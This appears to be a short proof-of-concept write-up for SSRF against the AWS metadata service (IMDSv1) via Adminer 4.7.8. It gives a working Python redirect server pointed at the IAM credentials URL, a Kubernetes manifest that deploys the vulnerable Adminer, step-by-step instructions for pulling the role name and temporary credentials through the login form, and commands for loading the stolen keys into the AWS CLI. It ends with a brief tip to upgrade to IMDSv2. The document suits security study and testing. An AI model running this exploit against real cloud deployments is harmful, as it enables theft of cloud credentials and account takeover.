AWS metadata service v1 SSRF POC

POC process

  • Construct attack machine to listener and redirect the credentials url
 1#!/usr/bin/env python3
 2
 3
 4# ./redirect.py 1337 http://169.254.169.254/latest/meta-data/iam/security-credentials/
 5
 6import sys
 7from http.server import HTTPServer, BaseHTTPRequestHandler
 8
 9if len(sys.argv)-1 != 2:
10        print("""
11        Usage: {} <port_number> <url>
12            """.format(sys.argv[0]))
13        sys.exit()
14
15class Redirect(BaseHTTPRequestHandler):
16     def do_GET(self):
17         self.send_response(301)
18         self.send_header('Location', sys.argv[2])
19         self.end_headers()
20
21HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

Install the has vulnerability program for example: Adminer v4.7.8

 1apiVersion: apps/v1
 2kind: Deployment
 3metadata:
 4  # Unique key of the Deployment instance
 5  name: adminer-v4.7.8
 6  namespace: default
 7spec:
 8  # 3 Pods should exist at all times.
 9  replicas: 1
10  selector:
11    matchLabels:
12      app: adminer-v4.7.8
13  template:
14    metadata:
15      labels:
16        # Apply this label to pods and default
17        # the Deployment label selector to this value
18        app: adminer-v4.7.8
19      # annotations:
20      #   instrumentation.opentelemetry.io/inject-java: 'true'
21      #   instrumentation.opentelemetry.io/container-names: "php-app-demo"
22
23    spec:
24      containers:
25      - name: adminer
26        # Run this image
27        image: adminer:4.7.8
28        # command: ["php", "-S", "[::]:8080", "-t", "/var/www/html"]
29        imagePullPolicy: IfNotPresent
30        ports:
31        - name: http
32          containerPort: 8080
33          protocol: TCP
34        env:
35          - name: TEST_AUTOINSTRUMENTATION
36            value: test_value

Execution testing

  • Forward the port to local use kubectl port-forward deploy/adminer-v4.7.8 -n default 8080:8080
  • Use the Elasticsearch(beta) System to login
  • Fill the remote python program address and port: x.x.x.x:1337
  • If the AWS use metadatav1 this should print the ROLE name
  • Change the python program redirect url to add the role name to suffix
  • Continue the login button, this shold print the credentials

Use awscli and the credentials

1export AWS_ACCESS_KEY_ID=ASIAEXAMPLEEXAMPLEEE
2export AWS_SECRET_ACCESS_KEY=EXAMPLEEXAMPLEEXAMPLEEXAMPLEEXAMPLESEXAM
3export AWS_SESSION_TOKEN=EXAMPLEEXAMPLEEXAMPLE...<snip>

Please upgrade the IMDS to v2

1TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
2curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/

Reference